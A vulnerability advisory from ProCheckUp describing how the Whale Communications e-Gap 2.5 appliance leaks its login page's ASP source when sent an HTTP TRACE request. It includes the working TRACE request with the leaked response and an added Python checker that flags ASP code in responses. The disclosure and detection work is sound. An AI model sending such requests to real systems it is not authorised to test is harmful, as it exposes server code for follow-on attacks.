PR03-07: Whale Communications e-Gap security appliance discloses source code via HTTP TRACE method
Vulnerability found: 1st December 2003
Advisory publicly released: 14 January 2004
Vulnerable OS: Microsoft Windows 2000 based appliance
Platform: Whale Communications e-Gap security appliance Version 2.5
CVE Candidate: CVE-2003-1127
BID: 9431
CERT: VU#371470
Severity: Anonymous attackers can obtain the source code of the login page by submitting an unexpected request.
Description:
The Whale Communications e-Gap appliance provides a highly secure remote web access platform for companies. When an unexpected HTTP method is submitted with a URL, the appliance returns the source code of the login page. It might be possible to access other pages' source code. The appliance, we understand, was configured using the standard options.
Proof of concept:
Normally requesting the following brings up the login page.
REQUEST:-
GET / HTTP/1.0
PARTIAL RESPONSE:-
<HTML>
<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<TITLE>Whale Communications Login Page</TITLE>
[snip]
However, substituting the TRACE method for GET clearly returns the source code of the login page.
REQUEST:-
TRACE / HTTP/1.0
PARTIAL RESPONSE:-
<%@ Language=VBScript %>
<!--#include file="WhlCacheCleanFunc.inc"-->
<% Response.Expires = 0 %>
<HTML>
<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<TITLE>Whale Communications Login Page</TITLE>
[snip]
Consequences:
Remote attackers can inspect the source code of the login page, providing information which might be used in further attacks.
Fix:
Whale Communications have produced a patch for this vulnerability (as of 15th December 2003), and the advice to customers is to get in touch with their local Whale support contact.
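A regression check for the behaviour shown in the proof of concept, added here as an example (it is not ProCheckUp's or Whale Communications' code): it scans captured HTTP responses for server-side ASP constructs that should never reach a client. The captures are constructed; their status lines and headers are assumptions, and the bodies follow the partial responses above.

```python
import re

# Server-side ASP constructs that must never appear in a response body.
# All three occur in the TRACE response quoted in the advisory.
LEAK_PATTERNS = {
    "asp_directive": re.compile(r"<%@\s*Language\s*=", re.I),
    "asp_code_block": re.compile(r"<%(?!@).*?%>", re.S),
    "ssi_include": re.compile(r'<!--\s*#include\s+(?:file|virtual)\s*=\s*"[^"]*"', re.I),
}


def split_response(raw):
    """Split a captured HTTP response into (status_code, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line = head.split("\r\n", 1)[0]
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[1].isdigit():
        raise ValueError("not an HTTP response: %r" % status_line)
    return int(parts[1]), body


def find_source_leaks(raw):
    """Return the sorted names of server-side constructs found in the body."""
    _, body = split_response(raw)
    return sorted(name for name, rx in LEAK_PATTERNS.items() if rx.search(body))


def audit(captures):
    """Map each HTTP method to its leak list; an empty list means rendered output only."""
    return {method: find_source_leaks(raw) for method, raw in captures.items()}


# Constructed captures (status line and headers assumed; bodies follow the advisory).
RENDERED = (
    "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<HTML>\n<HEAD>\n<TITLE>Whale Communications Login Page</TITLE>\n"
)
LEAKED = (
    "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<%@ Language=VBScript %>\n"
    '<!--#include file="WhlCacheCleanFunc.inc"-->\n'
    "<% Response.Expires = 0 %>\n"
    "<HTML>\n<HEAD>\n<TITLE>Whale Communications Login Page</TITLE>\n"
)

if __name__ == "__main__":
    for method, leaks in audit({"GET": RENDERED, "TRACE": LEAKED}).items():
        print(method, "LEAK" if leaks else "ok", leaks)
```

After the patch is applied, a capture of every method the appliance answers should produce an empty leak list.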
References:
http://www.procheckup.com/Vulnerability_2004.php
Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)
Legal:
Copyright 2007 ProCheckUp Ltd.
All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if the Bulletin is not changed or edited in any way, is attributed to ProCheckUp indicating this web page URL, and provided such reproduction and/or distribution is performed for non-commercial purposes.
Any other use of this information is prohibited.
ProCheckUp is not liable for any misuse of this information by any third party. ProCheckUp is not responsible for the content of external Internet sites.